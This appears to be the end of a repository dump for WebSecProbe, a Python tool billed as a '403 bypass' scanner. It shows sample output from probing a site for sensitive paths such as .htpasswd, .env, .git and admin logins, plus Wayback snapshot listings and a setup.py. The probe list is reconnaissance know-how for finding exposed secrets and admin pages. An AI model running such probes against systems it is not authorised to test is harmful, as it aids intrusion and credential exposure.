"+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.htpasswd | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.htaccess | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/web.config | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/web.config/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/robots.txt/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.htpasswd/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/admin/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/admin | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/administrator | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/administrator/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/login/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/wp-admin | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/login | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/wp-admin/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/wp-login | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/wp-login/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/config | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.git | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/config/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.svn | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.hg | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.git/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.svn/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.hg/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.bzr/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.bzr | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/test/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/demo/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/demo | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/backup | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/test | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/tmp | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/temp | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/backup/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/tmp/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.env/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/temp/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.env | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.DS_Store | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "| https://spyboy.in/premium/.DS_Store/ | \u001b[31m404\u001b[0m | 1226 |\n", "+-------------------------------------------------------------------+---------------+------------------+\n", "Wayback machine:\n", "Available snapshots:\n", "Timestamp: timestamp\n", "Original URL: original\n", "Wayback URL: https://web.archive.org/web/timestamp/original\n", "\n", "Timestamp: 20220816200717\n", "Original URL: https://spyboy.in/premium/\n", "Wayback URL: https://web.archive.org/web/20220816200717/https://spyboy.in/premium/\n", "\n", "Timestamp: 20230129181137\n", "Original URL: https://spyboy.in/premium/\n", "Wayback URL: https://web.archive.org/web/20230129181137/https://spyboy.in/premium/\n", "\n", "Timestamp: 20230321053821\n", "Original URL: https://spyboy.in/premium/\n", "Wayback URL: https://web.archive.org/web/20230321053821/https://spyboy.in/premium/\n", "\n", "Timestamp: 20230602162436\n", "Original URL: https://spyboy.in/premium/\n", "Wayback URL: https://web.archive.org/web/20230602162436/https://spyboy.in/premium/\n", "\n", "Timestamp: 20230924132931\n", "Original URL: https://spyboy.in/premium/\n", "Wayback URL: https://web.archive.org/web/20230924132931/https://spyboy.in/premium/\n", "\n", "Timestamp: 20240213163200\n", "Original URL: https://spyboy.in/premium\n", "Wayback URL: https://web.archive.org/web/20240213163200/https://spyboy.in/premium\n", "\n", "Timestamp: 20240213163200\n", "Original URL: https://spyboy.in/premium/\n", "Wayback URL: https://web.archive.org/web/20240213163200/https://spyboy.in/premium/\n", "\n" ] } ] } ] } ================================================ FILE: requirements.txt ================================================ requests tabulate ================================================ FILE: setup.py ================================================ from setuptools import setup, find_packages import codecs import os here = os.path.abspath(os.path.dirname(__file__)) with codecs.open(os.path.join(here, "README.md"), encoding="utf-8") as fh: long_description = "\n" + fh.read() VERSION = '0.0.12' DESCRIPTION = 'Bypass 403' # Setting up setup( name="WebSecProbe", version=VERSION, author="Spyboy", author_email="contact@spyboy.in", description=DESCRIPTION, long_description=open('README.md').read(), long_description_content_type='text/markdown', packages=find_packages(), url="https://github.com/spyboy-productions/WebSecProbe/", Homepage="https://github.com/spyboy-productions/WebSecProbe/", Repository="https://github.com/spyboy-productions/WebSecProbe/", license="MIT", install_requires=['requests', 'tabulate'], keywords=['HTTP-Request-Analysis', 'bypass-403', 'Header-Injection', 'Historical-Analysis', 'Payload-Variations', 'Vulnerability-Assessment'], classifiers=[ "Development Status :: 1 - Planning", "Intended Audience :: Developers", "Programming Language :: Python :: 3", "Operating System :: Unix", "Operating System :: MacOS :: MacOS X", "Operating System :: Microsoft :: Windows", ], entry_points={ 'console_scripts': [ 'WebSecProbe = WebSecProbe.main:main', ], }, )